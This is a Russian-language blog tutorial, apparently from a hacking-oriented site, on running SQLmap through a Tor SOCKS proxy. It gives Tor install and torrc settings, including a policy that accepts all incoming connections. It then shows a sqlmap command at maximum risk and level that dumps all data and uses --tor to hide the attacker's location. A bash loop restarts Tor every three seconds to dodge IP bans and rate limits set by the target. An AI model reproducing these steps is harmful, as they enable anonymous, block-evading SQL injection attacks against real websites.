В этой статье покажу, как настроить прокси-сервер Tor SOCKS на Linux и MacBook, а затем автоматизировать процесс изменения своего IP-адреса при тестировании с помощью SQLmap и bash-скрипта.
Еще по теме: Хакерские расширения для Firefox
Обход WAF с помощью SQLmap и Tor
Tor — это популярное программное обеспечение с открытым исходным кодом, используемое для анонимного общения в Интернете. Он обычно используется для анонимизации действий в сети. Один из способов использования Tor — настроить прокси-сервер Tor SOCKS на Linux или MacBook.
Установка Tor на Linux и macOS
Linux
1 |
sudo apt-get install tor |
macOS
1 |
brew install tor |
Настройка прокси-сервера Tor SOCKS
Чтобы настроить прокси-сервер Tor SOCKS, необходимо изменить файл конфигурации Tor, который обычно находится здесь:
1 |
/etc/tor/torrc |
Откройте файл в вашем текстовом редакторе и добавьте следующие строки в конец файла:
1 2 |
SOCKSPort 9050 SOCKSPolicy accept * |
Теперь после добавления, прокси-сервер Tor SOCKS будет прослушивать порт 9050 и разрешать все входящие соединения.
Перезапуск Tor
Linux
1 |
sudo systemctl restart tor |
macOS
1 |
brew services restart tor |
Проверка прокси-сервера Tor SOCKS
Чтобы получить общедоступный IP-адрес с помощью команды curl через прокси-сервер Tor SOCKS, выполните команду:
1 |
curl — socks5-hostname localhost:9050 https://api.ipify.org/ |
Если вы видите IP отличный от вашего IP-адреса, тогда все робит.
Запуск SqlMap с помощью Tor
1 |
sqlmap -u “https://example.com/sitemap.xml?offset=1*" — risk=3 — level=5 -a — random-agent — tor |
Параметр —tor запускает прокси-сервер Tor, который будет использоваться в атаке. Это поможет скрыть свой IP-адрес и местоположение, направляя атаку через прокси-сервер.
Использования скрипта для смены IP
Но IP-адрес Tor, после нескольких запросов может быть заблокирован.
Чтобы решит эту проблему, напишем простой скрипт bash с бесконечным циклом, который будет перезапускать Torкаждые 3 секунды:
1 2 3 4 |
while true; do sudo pkill -HUP tor sleep 3 done |
Заключение
Последний шаг позволит обойти не только блокировку, но и ограничение скорости на основе IP, которую могла бы применить цель.
ПОЛЕЗНЫЕ ССЫЛКИ:
- Взлом сайта с помощью SQLMap
- Обход WAF короткой полезной нагрузкой XSS
- Анонимность в Kali Linux с помощью Tor и Proxychains